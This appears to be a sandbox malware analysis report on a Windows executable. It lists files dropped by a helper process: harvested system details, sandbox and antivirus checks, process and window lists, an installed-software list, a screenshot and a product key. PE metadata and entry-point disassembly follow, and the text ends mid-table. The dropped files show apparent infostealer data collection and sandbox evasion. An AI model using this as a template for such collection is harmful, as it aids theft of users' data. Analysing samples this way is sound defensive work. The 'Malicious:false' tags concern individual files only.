                                                                                                                                                                                                                                                          SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                                                                                                                                                                                                          SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                          MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                          SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                          SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                          SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                          Malicious:false
Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.700014595314478
Encrypted:false
SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:960373CA97DEDBA8576ECF40D0D1E39D
SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:false
Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with very long lines (1024), with CRLF line terminators
Category:dropped
Size (bytes):1026
Entropy (8bit):4.6994061563025005
Encrypted:false
SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text
Category:dropped
Size (bytes):1446
Entropy (8bit):5.407572469297613
Encrypted:false
SSDEEP:24:OKkf6JgXJ/lf3Jgd/5f6JgnQPUCddMfoHJTl5mfFKJTlNg8OfpJTlmfNJeikpqPm:lkf6JgXBlf3JgN5f6JgQPxdSfmJZwfFR
MD5:CEE54E135C6B81CDEAA9DFD5EA03C478
SHA1:AF1F82275F492BCAD22E069E85CCD3E0F2FC2B56
SHA-256:0766F4E7D7D88AF7F4EAE72FAD244BFDA8CFB0CA978CE238F321ACE705BF378F
SHA-512:F83AB89E6E68AB57AB50B278F9CFFC3F9D3FA86B692A3495070BFD29C06A2A25B89E8E40AEE48C11264C1F945079062F6B24A1EEA805DEB2916D388BBE3E92B0
Malicious:false
Preview:.APP: Office 16 Click-to-Run Extensibility Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008C-0000-0000-0000000FF1CE}...APP: Office 16 Click-to-Run Extensibility Component 64-bit Registration..VERSION: 16.0.16827.20056..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-00DD-0000-1000-0000000FF1CE}...APP: Office 16 Click-to-Run Licensing Component..VERSION: 16.0.16827.20130..INSTALL DATE: 21/07/2025 03:43:24..IDENTIFYING NUMBER: {90160000-008F-0000-1000-0000000FF1CE}...APP: Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532..VERSION: 14.36.32532..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {0025DD72-A959-45B5-A0A3-7EFEB15A8050}...APP: Java 8 Update 381..VERSION: 8.0.3810.9..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {77924AE4-039E-4CA4-87B4-2F32180381F0}...APP: Adobe Acrobat (64-bit)..VERSION: 23.006.20320..INSTALL DATE: 21/07/2025 03:43:23..IDENTIFYING NUMBER: {AC76BA86-1033-1033-
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:dropped
Size (bytes):90744
Entropy (8bit):7.774005061481302
Encrypted:false
SSDEEP:1536:CU3fLMA4tzXX8le4YTSKjfMDhxwwTg8/m6hyh/sfUzoJ5lCk7:PTGzXXaYTSKjfGkwBVyFsf+k57
MD5:6C46EF298BDE17E42E5ED3FF9FF1CB1E
SHA1:95A8AFA7AA83FF6ED63DBDD017FEF0B37868F447
SHA-256:980E549F8B17857E0D051D72E8075273A3D8AD669A5F4CE5873D3EE268B9C0F8
SHA-512:D2BB80E0A9DC2164F11FE17B02070F9C5C3F48C6D9FE98D2806B554A89E089F5999A17FB4557971741A6416569CA049D6FC5DEDBB5E6E3CE4B356DAB41E074CF
Malicious:false
Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3.*..m..,.X.c.#....O.*.i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text
Category:dropped
Size (bytes):509
Entropy (8bit):5.422491712734665
Encrypted:false
SSDEEP:12:RFNbwPRbVkb21eVSxa2YCnPjtszJxsWWvdUXyR:3VwP/kbdcxaRgPjtQJxsWdS
MD5:133F5FB6E0F456259B846036D5C1FAAD
SHA1:44B8B2403B78116E3FCB385628EC5CD6BD3BAD10
SHA-256:E6DA8FAF8F694CCA4378C474586DA2A76C99EAC93ABC2CD0B68E0EBD4B5D151D
SHA-512:D92D5E6114BDE43B43A0E5A117C24B33738D11D41E8053049E7A5514C16C2E8AB112C113EBE3147046080684609DC3C8EC56F2F31E6EA9A6F36B9C17BE3A64CD
Malicious:false
Preview:.[IP].External IP: 8.46.123.228.Internal IP: No network adapters with an IPv4 address in the system!.Gateway IP: 192.168.2.1..[Machine].Username: user.Compname: 724536.System: Microsoft Windows 10 Pro (64 Bit).CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.GPU: PA_NMRCU.RAM: 4095MB.DATE: 2024-11-29 4:57:07 am.SCREEN: 1280x1024.BATTERY: NoSystemBattery (100%).WEBCAMS COUNT: 0..[Virtualization].VirtualMachine: False.SandBoxie: False.Emulator: False.Processes: False.Hosting: False.Antivirus: Windows Defender.
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text
Category:dropped
Size (bytes):19326
Entropy (8bit):5.663781920299985
Encrypted:false
SSDEEP:96:HXC23eEqfTGZUEfw5zqYCWithTBFw6KGJLsSCWkW/R4lZ1ir2:HhqfQUEY5mnWitDFw6KYWWk0R4lZ142
MD5:41B7259C42BACC4B4A401B668E0402AD
SHA1:1946D39D1590DD5AA2142848ED2F8A31793164FB
SHA-256:E62C32D1A6CED47C849BCBC0C54F1E875386C8413A82E6C1F9BA08FC84B4FC0F
SHA-512:A442D86755FE53CEB7DAEF55866A09E844085B23AB589A95329ED8AFE8394E185832480581B27F6CE71A250F71695EEDC18E217F5A15F378C6B3624D5EC832A0
Malicious:false
Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: pelgCDCmFjscjZVAWzP..PID: 2148..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..PID: 6884..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: svchost..PID: 4296..EXE: C:\Windows\system32\svchost.exe..NAME: pelgCDCmFjscjZVAWzP..PID: 3864..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: C:\Windows\system32\svchost.exe..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: C:\Windows\System32\svchost.exe..NAME: winlogon..PID: 552..EXE: C:\Windows\system32\winlogon.exe..NAME:
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):31
Entropy (8bit):3.882606602358693
Encrypted:false
SSDEEP:3:TrYaJG8n:YaJG8
MD5:D1E22CCE22ADCABAE7A13D05660C427E
SHA1:17D273C95200FCD9B823104663467182F9034F27
SHA-256:E1FD987F24B5205B8FC59EC5D7925332F6EBEB6E0AD72229F67D8F6420D97919
SHA-512:2A4D07E12302B076885E1A07B3B646B5B96D94C1F881AE808695E1B8ACA9939C09945C0BDF9F54BE3D26704FFBDBA2DCD32A349E11BB00880DD8CE297AC64B81
Malicious:false
Preview:DPJN2-QF4WB-WCMWJ-VVRMW-4WG3C-Y
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text
Category:dropped
Size (bytes):15673
Entropy (8bit):5.607162459982602
Encrypted:false
SSDEEP:48:AOn4QNPFiy5be64x+xyzFMZafHB5HBXH2+oZYeZxHXbAdFe+Ra3O8deVhAjEN7qu:Lx5HyzqEdbzRZh
MD5:852FA560A944F492A58BF68D328D6095
SHA1:A536B5B0CE4C2970B9FE51713824A79B6D4C90E8
SHA-256:7838B9E51997819CD7F8AA92507E05F571EC09D7B47E2DC9A266D191F0EC22A9
SHA-512:7B7F5DCFF7B5E43F102A0B7A7E72816DAFA54C72BAEBE72E55CE1A3D61594667332647B998F653F9366B7068EC36804360414B0A2C1F8156BB36BC3DF1221F81
Malicious:false
Preview:NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 2148..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 3864..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 6860..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 6428..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjscjZVAWzP.exe..NAME: pelgCDCmFjscjZVAWzP..TITLE: New Tab - Google Chrome..PID: 3448..EXE: C:\Program Files (x86)\YxEDqklxHIkNZCSFarchTywbjSUSfYiiFzTTqtEfnXrRj\pelgCDCmFjs
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                                                                          Entropy (8bit):2.0
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Pm:e
                                                                                                                                                                                                                                                          MD5:C0826819636026DD1F3674774F06C51D
                                                                                                                                                                                                                                                          SHA1:1E768A21723E530122240FA219BFF8C3365F40B2
                                                                                                                                                                                                                                                          SHA-256:01B23136EA7F9F8B9E72C9E125FD710301BAEC28662B0DE2168967838C79E81A
                                                                                                                                                                                                                                                          SHA-512:8AF15968CE7287442204A26F411FF8C3AA6F43167D39A2719DF5C4540B3174D41A6C8063DB82EB49433805CD52F5BC1388BBD032C2C35260E05868C1BBA68E27
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:1392
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\timeout.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55
                                                                                                                                                                                                                                                          Entropy (8bit):4.5991860770036785
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:hYF8AgARcWmFsFJQZaVy:hYF/mFSQZas
                                                                                                                                                                                                                                                          MD5:471500D11DAF370CB75C597A4B1A7654
                                                                                                                                                                                                                                                          SHA1:1AC2D4BDA1A30E09287F680C2AD75C577B096898
                                                                                                                                                                                                                                                          SHA-256:C751BAFF37E4DC361F2C77BCC6B356159CC6178D1642244CBCD764A8DDE409B9
                                                                                                                                                                                                                                                          SHA-512:DB81C5CE33D78E5618F41738129B5E623300CEFF188D99E7173E4E524107EEDED4C3BE2F15AC4715D3D10EAC23E39841978BBD42326E5C4E016A2B938C37A855
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:..Waiting for 2 seconds, press CTRL+C to quit ....1.0..
                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.874676406425068
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:LKxcbzlwkz.exe
                                                                                                                                                                                                                                                          File size:5'015'009 bytes
                                                                                                                                                                                                                                                          MD5:8959a4884f81ac4db0967b534dae9617
                                                                                                                                                                                                                                                          SHA1:e4cc4e745820910b4f427b6c2385a43c87b7ce3b
                                                                                                                                                                                                                                                          SHA256:02c5585c0346b9f7632691c41bb5741b8ab7b0f785e707ae65e918633bb5b801
                                                                                                                                                                                                                                                          SHA512:7602456939b36157ce957e267d9ca90f0017c50a3662473a44e5032e65b8d13b27d272e12dd5d380468eb4e5ba6d0c23e4280ecb23e1c51ea915768758d0ab1b
                                                                                                                                                                                                                                                          SSDEEP:98304:dtrbTA19yskZYOgVSKe1blpY02UrjooqqjHIFIeoEzkShdF6uehA8np:fc19ysyw6pY02UAoq8HIWeo6kC03dp
                                                                                                                                                                                                                                                          TLSH:0B36122AA64BD420C17177B55EB7F3BA2A3BF422172BDED397C41D7649B81812A07313
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                                                                                                                                                          Icon Hash:1679587870ac996f
                                                                                                                                                                                                                                                          Entrypoint:0x4165c1
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:5
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          call 00007EFCE0B56DBBh
                                                                                                                                                                                                                                                          jmp 00007EFCE0B4DC2Eh
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                          mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                                                                                                          mov edi, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                                                                                                          mov edx, ecx
                                                                                                                                                                                                                                                          add eax, esi
                                                                                                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                                                                                                          jbe 00007EFCE0B4DDAAh
                                                                                                                                                                                                                                                          cmp edi, eax
                                                                                                                                                                                                                                                          jc 00007EFCE0B4DF46h
                                                                                                                                                                                                                                                          cmp ecx, 00000080h
                                                                                                                                                                                                                                                          jc 00007EFCE0B4DDBEh
                                                                                                                                                                                                                                                          cmp dword ptr [004A9724h], 00000000h
                                                                                                                                                                                                                                                          je 00007EFCE0B4DDB5h
                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                          and edi, 0Fh
                                                                                                                                                                                                                                                          and esi, 0Fh
                                                                                                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                                                          jne 00007EFCE0B4DDA7h
jmp 00007EFCE0B4E182h
test edi, 00000003h
jne 00007EFCE0B4DDB6h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007EFCE0B4DDCBh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007EFCE0B4DDAEh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007EFCE2FC65A7h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007EFCE0B4DD6Eh
rep movsd
jmp dword ptr [00000000h+edx*4]
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x4a858 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
